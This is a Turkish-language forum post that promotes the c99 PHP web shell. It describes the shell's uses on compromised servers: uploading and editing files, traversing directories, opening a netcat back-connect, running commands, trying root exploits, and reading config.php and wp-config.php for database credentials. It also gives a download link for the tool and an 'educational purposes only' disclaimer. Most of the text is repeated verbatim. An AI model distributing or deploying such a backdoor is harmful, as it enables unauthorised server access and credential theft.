ali yılmaz
New member
- Katılım
- 23 Ara 2005
- Mesajlar
- 2
- Reaction score
- 0
- Puanları
- 0
c99 shell diger sheller gibi zararli php scripttir. bu scriptle linux ve windows sunuculara arka kapidan bir takim islemler yapilabilir. Serverde birakmak, server güvenligi için tehlikelidir. c99 shell bütün antivirüslerce zararli yazilim olarak kabul edilmekte ve antivirüslerce silinmektedir. Bu scriptte serverdeki izinler yetkiler (permission) beyaz renkli olanlar yazma yetkisi olmayanlar, yesil renkli olanlar ise yazilabilir tam yetki izinlerini göstermektedir.
Gözat Upload ise yesil renkliyse dosya upload edilebilir, dosya uploadina izin var demektir Kirmizi renkteyse dosya upload izni yok demektir. Bu scriptle klasör olusturabilir, dizinler arasi geçis varsa izinler müsaitse bütün dizinler kontrol edilebilir. Degistir bölümünden yesil renkli yazma izinli dosyalar degistirilebilir. Gene bu scritle back connect arka kapidan netcat nc.exe vasitasiyla baglanilabilir. Serverde izin verilen bütün komutlar çalistirilabilir, root exploitleri denenebilir, Kriptolu veya kriptosuz sifreler okunabilir. Diger bir özelligide SQL bölümünden config.php configuration.php, wp-config.php gibi dosyalar okunarak sql baglanti bilgileri alinarak sql ye erisilebilir, sql ile ilgili bütün islemler yapilabilir. Sonuç itibariyle, serverde bu tür scriptlere karsi önlem alinmadiysa son derece tehlikelidir.
Bu Scriptler Sadece Egitim Amaclidir.
Download: http://www.c99php.com/shell/c99.rar
Direk link: <?php echo getenv("HTTP_HOST"); ?> c99shell - Edited By KingDefacer
Gözat Upload ise yesil renkliyse dosya upload edilebilir, dosya uploadina izin var demektir Kirmizi renkteyse dosya upload izni yok demektir. Bu scriptle klasör olusturabilir, dizinler arasi geçis varsa izinler müsaitse bütün dizinler kontrol edilebilir. Degistir bölümünden yesil renkli yazma izinli dosyalar degistirilebilir. Gene bu scritle back connect arka kapidan netcat nc.exe vasitasiyla baglanilabilir. Serverde izin verilen bütün komutlar çalistirilabilir, root exploitleri denenebilir, Kriptolu veya kriptosuz sifreler okunabilir. Diger bir özelligide SQL bölümünden config.php configuration.php, wp-config.php gibi dosyalar okunarak sql baglanti bilgileri alinarak sql ye erisilebilir, sql ile ilgili bütün islemler yapilabilir. Sonuç itibariyle, serverde bu tür scriptlere karsi önlem alinmadiysa son derece tehlikelidir.
Bu Scriptler Sadece Egitim Amaclidir.
Download: http://www.c99php.com/shell/c99.rar
Direk link: <?php echo getenv("HTTP_HOST"); ?> c99shell - Edited By KingDefacer